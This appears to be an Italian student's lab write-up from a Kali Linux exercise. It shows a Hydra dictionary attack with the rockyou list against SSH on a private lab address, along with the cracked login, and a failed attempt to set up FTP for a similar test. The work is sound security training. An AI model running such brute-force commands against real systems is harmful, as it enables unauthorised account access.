Test Hack acccount S6L5
Quando stavo sistemando alcune configurazioni prima nello svolgere gli esercizi ho avuto alcuni
problemi
1 - nell'installazione della seclist mi è comparso un errore "Error: Unable to locate package seclists"
Allora per risolverlo ho dovuto clonare con il github "sudo git clone --depth 1 https://github.com/danielmiessler/SecLists.git /usr/share/seclists"

┌──(kali㉿kali)-[~]
└─$ sudo git clone --depth 1 https://github.com/danielmiessler/SecLists.git /usr/share/seclists
Cloning into '/usr/share/seclists'...
remote: Enumerating objects: 6037, done.
remote: Counting objects: 100% (6037/6037), done.
remote: Compressing objects: 100% (3693/3693), done.
remote: Total 6037 (delta 2060), reused 5558 (delta 2037), pack-reused 0 (from 0)
Receiving objects: 100% (6037/6037), 665.98 MiB | 4.63 MiB/s, done.
Resolving deltas: 100% (2060/2060), done.
Updating files: 100% (6260/6260), done.

2- Togliere i permessi al root dato che non si può allora scrivo i comandi sudo service ssh start per abilitare il servizio ssh e sudo adduser test_user per abilitare i permessi nella creazione di un secondo
utente e digito la password con testpass

┌──(kali㉿kali)-[~]
└─$ sudo adduser test_user
info: Adding user `test_user' ...
info: Selecting UID/GID from range 1000 to 59999 ...
info: Adding new group `test_user' (1001) ...
info: Adding new user `test_user' (1001) with group `test_user (1001)' ...
info: Creating home directory `/home/test_user' ...
info: Copying files from `/etc/skel' ...
New password:
Retype new password:
passwd: password updated successfully
Changing the user information for test_user
Enter the new value, or press ENTER for the default
        Full Name []: test_user
        Room Number []: 1
        Work Phone []: +37 3711189472
        Home Phone []:
        Other []: Ciao
Is the information correct? [Y/n] Y
info: Adding new user `test_user' to supplemental / extra groups `users' ...
info: Adding user `test_user' to group `users' ...

Risolto il problema ora ci interfacciamo su Hydra.

hydra -l monkey -P /home/kali/Desktop/rockyou.txt 192.168.1.201 ssh

┌──(kali㉿kali)-[~/Desktop]
└─$ hydra -l monkey -P /home/kali/Desktop/rockyou.txt 192.168.1.201 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-15 11:57:35
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344401 login tries (l:1/p:14344401), ~896526 tries per task
[DATA] attacking ssh://192.168.1.201:22/
[22][ssh] host: 192.168.1.201   login: monkey   password: superman
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-05-15 11:57:48

Scovata la password con ssh ora provo con il tcp e per attivare il servizio digito sudo apt install vsftpd e dopo di che lo avvio con  sudo service vsftpd start

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo apt install vsftpd
Error: Unable to locate package vsftpd

Ma rimango bloccato in tale problema